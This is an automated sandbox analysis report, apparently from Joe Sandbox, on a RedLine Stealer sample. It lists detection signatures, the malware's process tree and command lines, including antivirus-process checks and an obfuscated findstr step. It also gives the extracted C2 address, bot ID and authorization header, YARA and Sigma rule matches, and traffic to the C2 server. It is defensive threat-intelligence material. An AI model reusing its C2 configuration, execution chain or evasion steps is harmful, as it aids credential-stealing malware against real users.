Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
Analysis ID:	1632796
MD5:	af3df67046abb1a4bd2600009fb51f19
SHA1:	4dc05e14c3e44f51a02555d2230e1c2d8219d66f
SHA256:	dc5eb50fd2c6a9351e5b2edb5ab4ddd31f5225ec5260380f05f8cf24e824bffd
Tags:	exeuser-SecuriteInfoCom
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

DLL reload attack detected

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected RedLine Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Drops PE files with a suspicious file extension

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Obfuscated command line found

Renames NTDLL to bypass HIPS

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Uncommon Svchost Parent Process

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe (PID: 7372 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe" MD5: AF3DF67046ABB1A4BD2600009FB51F19)

svchost.exe (PID: 7408 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cmd.exe (PID: 7428 cmdline: "C:\Windows\System32\cmd.exe" /c cmd < Bel.tmp MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7480 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

tasklist.exe (PID: 7496 cmdline: tasklist /FI "imagename eq BullGuardCore.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)

find.exe (PID: 7512 cmdline: find /I /N "bullguardcore.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)

tasklist.exe (PID: 7540 cmdline: tasklist /FI "imagename eq PSUAService.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)

find.exe (PID: 7548 cmdline: find /I /N "psuaservice.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)

findstr.exe (PID: 7584 cmdline: findstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

Rarissima.exe.pif (PID: 7608 cmdline: Rarissima.exe.pif u MD5: C56B5F0201A3B3DE53E561FE76912BFD)

jsc.exe (PID: 7576 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)

waitfor.exe (PID: 7620 cmdline: waitfor /t 5 cPJmppTIOgHphOgIZlJIVQpIXRsFPuungjFRADw MD5: E58E152B44F20DD099C5105DE482DF24)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": "45.67.231.189:49441", "Bot Id": "mamonts", "Authorization Header": "b7fcef6957ac0cbb870615af4b502bf0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x13637:$a1: get_encrypted_key 0x12cf2:$a2: get_PassedPaths 0x1165f:$a3: ChromeGetLocalName 0x12f2c:$a4: GetBrowsers 0x18a30:$a5: Software\Valve\SteamLogin Data 0x17348:$a6: %appdata%\ 0x12a07:$a7: ScanPasswords
0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x12bdf:$a1: get_encrypted_key 0x2cbe7:$a1: get_encrypted_key 0x467ef:$a1: get_encrypted_key 0x5f587:$a1: get_encrypted_key 0x1229a:$a2: get_PassedPaths 0x2c2a2:$a2: get_PassedPaths 0x45eaa:$a2: get_PassedPaths 0x5ec42:$a2: get_PassedPaths 0x10c07:$a3: ChromeGetLocalName 0x2ac0f:$a3: ChromeGetLocalName 0x44817:$a3: ChromeGetLocalName 0x5d5af:$a3: ChromeGetLocalName 0x124d4:$a4: GetBrowsers 0x2c4dc:$a4: GetBrowsers 0x460e4:$a4: GetBrowsers 0x5ee7c:$a4: GetBrowsers 0x17fd8:$a5: Software\Valve\SteamLogin Data 0x31fe0:$a5: Software\Valve\SteamLogin Data 0x4bbe8:$a5: Software\Valve\SteamLogin Data 0x64980:$a5: Software\Valve\SteamLogin Data 0x168f0:$a6: %appdata%\
0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x1163f:$a1: get_encrypted_key 0x10cfa:$a2: get_PassedPaths 0xf667:$a3: ChromeGetLocalName 0x10f34:$a4: GetBrowsers 0x16a38:$a5: Software\Valve\SteamLogin Data 0x15350:$a6: %appdata%\ 0x10a0f:$a7: ScanPasswords
0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x13a4f:$a1: get_encrypted_key 0x1310a:$a2: get_PassedPaths 0x11a77:$a3: ChromeGetLocalName 0x13344:$a4: GetBrowsers 0x18e48:$a5: Software\Valve\SteamLogin Data 0x17760:$a6: %appdata%\ 0x12e1f:$a7: ScanPasswords
00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x1362f:$a1: get_encrypted_key 0x12cea:$a2: get_PassedPaths 0x11657:$a3: ChromeGetLocalName 0x12f24:$a4: GetBrowsers 0x18a28:$a5: Software\Valve\SteamLogin Data 0x17340:$a6: %appdata%\ 0x129ff:$a7: ScanPasswords
0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x137bf:$a1: get_encrypted_key 0x12e7a:$a2: get_PassedPaths 0x117e7:$a3: ChromeGetLocalName 0x130b4:$a4: GetBrowsers 0x18bb8:$a5: Software\Valve\SteamLogin Data 0x174d0:$a6: %appdata%\ 0x12b8f:$a7: ScanPasswords
Process Memory Space: Rarissima.exe.pif PID: 7608	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: jsc.exe PID: 7576	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
19.2.jsc.exe.be0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
19.2.jsc.exe.be0000.0.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x13a2f:$a1: get_encrypted_key 0x130ea:$a2: get_PassedPaths 0x11a57:$a3: ChromeGetLocalName 0x13324:$a4: GetBrowsers 0x18e28:$a5: Software\Valve\SteamLogin Data 0x17740:$a6: %appdata%\ 0x12dff:$a7: ScanPasswords
19.2.jsc.exe.be0000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x11a23:$gen01: ChromeGetRoamingName 0x11a57:$gen02: ChromeGetLocalName 0x11a80:$gen03: get_UserDomainName 0x13a2f:$gen04: get_encrypted_key 0x13114:$gen05: browserPaths 0x13324:$gen06: GetBrowsers 0x12e99:$gen07: get_InstalledInputLanguages 0x111ef:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x17710:$spe0: Profile_encrypted_value 0x17820:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x189e0:$spe2: AFileSystemntivFileSystemirusPrFileSystemoduFileSystemct\|AntiFileSystemSpyWFileSystemareProFileSystemduct\|FireFileSystemwallProdFileSystemuct 0x18b80:$spe3: OpHandlerenVPHandlerN ConHandlernect%DSK_23%Opera GXcookies 0x18bf8:$spe4: //settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeROOT\SecurityCenter 0x18cb0:$spe5: ROOT\SecurityCenter2Web DataSteamPath 0x190f0:$spe6: windows-1251, CommandLine: 0x13e26:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole 0x13ec6:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\ 0x1476e:$spe9: wallet 0xf9d0:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xfa8a:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xfed1:$typ03: A937C899247696B6565665BE3BD09607F49A2042
19.2.jsc.exe.be0000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x19108:$pat14: , CommandLine: 0x12faf:$v2_1: ListOfProcesses 0x12d6b:$v4_3: base64str 0x139dc:$v4_4: stringKey 0x11426:$v4_5: BytesToStringConverted 0x1043a:$v4_6: FromBase64 0x119df:$v4_8: procName 0x11ce0:$v5_1: DownloadAndExecuteUpdate 0x12c63:$v5_2: ITaskProcessor 0x11cce:$v5_3: CommandLineUpdate 0x11cbf:$v5_4: DownloadUpdate 0x12191:$v5_5: FileScanning 0x1166a:$v5_7: RecordHeaderField 0x112b4:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Rarissima.exe.pif u, CommandLine: Rarissima.exe.pif u, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif, ParentCommandLine: cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7480, ParentProcessName: cmd.exe, ProcessCommandLine: Rarissima.exe.pif u, ProcessId: 7608, ProcessName: Rarissima.exe.pif

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe" , CommandLine: "C:\Windows\System32\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe, ParentProcessId: 7372, ParentProcessName: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe" , ProcessId: 7408, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\System32\svchost.exe" , CommandLine: "C:\Windows\System32\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe, ParentProcessId: 7372, ParentProcessName: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe" , ProcessId: 7408, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Dici.tmp

Avira: detection malicious, Label: DR/FakePic.Gen

Found malware configuration

Source: 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: RedLine {"C2 url": "45.67.231.189:49441", "Bot Id": "mamonts", "Authorization Header": "b7fcef6957ac0cbb870615af4b502bf0"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Virustotal: Detection: 71%			Perma Link
Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	ReversingLabs: Detection: 57%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: jsc.exe, 00000013.00000002.2413035334.00000000010E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbs source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdbKv source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbP source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: xBCzEiVyOcVH.dll.10.dr
Source:	Binary string: wntdll.pdb source: xBCzEiVyOcVH.dll.10.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdbt source: jsc.exe, 00000013.00000002.2413035334.0000000001132000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: jsc.exe, 00000013.00000002.2413035334.000000000114C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: jsc.exe, 00000013.00000002.2413035334.0000000001132000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00403287 FindFirstFileW,FindClose,SetLastError,CompareFileTime,	0_2_00403287
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00402C10 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_00402C10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00402D2D FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,	0_2_00402D2D
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_009B4005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009B494A GetFileAttributesW,FindFirstFileW,FindClose,	10_2_009B494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_009B3CE2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_009BC2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	10_2_009BCD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009BCD14 FindFirstFileW,FindClose,	10_2_009BCD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_009BF5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_009BF735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_009BFA36

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.67.231.189:49441

Source: global traffic

TCP traffic: 192.168.2.4:49721 -> 45.67.231.189:49441

Source: Joe Sandbox View

ASN Name: SERVERIUS-ASNL SERVERIUS-ASNL

Source: unknown

DNS traffic detected: query: xCYuqFZpbOjjkUqkfthcb.xCYuqFZpbOjjkUqkfthcb replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189
Source: unknown	TCP traffic detected without corresponding DNS query: 45.67.231.189

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009C29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

10_2_009C29BA

Source: global traffic

DNS traffic detected: DNS query: xCYuqFZpbOjjkUqkfthcb.xCYuqFZpbOjjkUqkfthcb

Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyx
Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
